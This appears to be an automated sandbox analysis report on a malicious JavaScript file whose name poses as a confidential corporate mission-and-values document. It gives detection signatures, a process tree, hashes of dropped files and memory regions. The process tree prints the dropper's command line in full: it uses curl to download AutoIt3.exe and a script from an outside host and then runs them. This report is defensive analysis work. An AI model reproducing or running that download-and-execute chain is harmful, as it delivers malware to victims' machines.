Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2023 07:18

General

  • Target

    Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js

  • Size

    49KB

  • MD5

    c19568c51692a5b4dbfc29c02fafcf8d

  • SHA1

    b265c4f15c591a241d19c7284efeeb1e73407df0

  • SHA256

    c8c425368b40c30a09a8e4990e53a1df4c29493ad138287493da0d6f56f1dade

  • SHA512

    329efccd2808ffd1ee7c6e741890aad2ee22705bd0c2703a11f054e6d29520964c39edfb039cf3834c0e23990994b95748edb74944fdfad1d8c78e5adc9b4dbc

  • SSDEEP

    768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Dxt7niEL:nAIMFFdYMxAcEQDFXL

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3800
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
      1⤵
        PID:3788
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
          PID:3888
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
            PID:3732
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            1⤵
              PID:3572
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              1⤵
                PID:2660
              • C:\Windows\system32\sihost.exe
                sihost.exe
                1⤵
                  PID:2480
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                  1⤵
                    PID:2464
                  • C:\Windows\system32\wscript.exe
                    wscript.exe C:\Users\Admin\AppData\Local\Temp\Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:3796
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb & Autoit3.exe sejtnt.au3
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5016
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:3408
                        • C:\Windows\system32\curl.exe
                          curl -o Autoit3.exe http://hgfdytrywq.com:80
                          3⤵
                            PID:5032
                          • C:\Windows\system32\curl.exe
                            curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb
                            3⤵
                              PID:3184
                            • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
                              Autoit3.exe sejtnt.au3
                              3⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:1980
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ping 127.0.0.1
                                4⤵
                                  PID:620
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c ping 127.0.0.1
                                  4⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Blocklisted process makes network request
                                  • Drops startup file
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4968

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\bcheebd\Autoit3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\ProgramData\bcheebd\bccdaba\ddhbakf

                            Filesize

                            166B

                            MD5

                            8be387116407b4ac1197f164d038f706

                            SHA1

                            22af1a1e9d691321316c9ea21961425642863b73

                            SHA256

                            6a0a730f81cd577e21064c36d67bfe1d8bd1ddf54bca4b82e4bd10385a0d9a3e

                            SHA512

                            ee7101912d13c3ae5987065c966cf1293088d21752f837495f522a005ce6c343dd74aefb449a128b8c0def26762b36f611242b704d973d8a94977daf59da9c33

                          • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\Users\Admin\AppData\Local\Temp\sejtnt.au3

                            Filesize

                            487KB

                            MD5

                            4c5474759bd10c4fd072e73ae027b733

                            SHA1

                            6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                            SHA256

                            be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                            SHA512

                            b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                          • \??\c:\temp\bckekhe.au3

                            Filesize

                            487KB

                            MD5

                            4c5474759bd10c4fd072e73ae027b733

                            SHA1

                            6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                            SHA256

                            be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                            SHA512

                            b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                          • memory/1980-6-0x00000000012F0000-0x00000000016F0000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/1980-7-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-15-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-16-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-17-0x00000000012F0000-0x00000000016F0000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/1980-18-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-19-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-20-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/1980-23-0x00000000043C0000-0x00000000046F2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4968-53-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-61-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-24-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-25-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-30-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-31-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-32-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-34-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-35-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-36-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-37-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-40-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-44-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-45-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-46-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-47-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-49-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-48-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-50-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-51-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-52-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-21-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-54-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-55-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-57-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-56-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-58-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-59-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-60-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-22-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-62-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-63-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-64-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-65-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-66-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-67-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-68-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-69-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-70-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-72-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-73-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-75-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-78-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-77-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-80-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-79-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-81-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-82-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-83-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-84-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-86-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-85-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-87-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-89-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-90-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-91-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-92-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4968-93-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB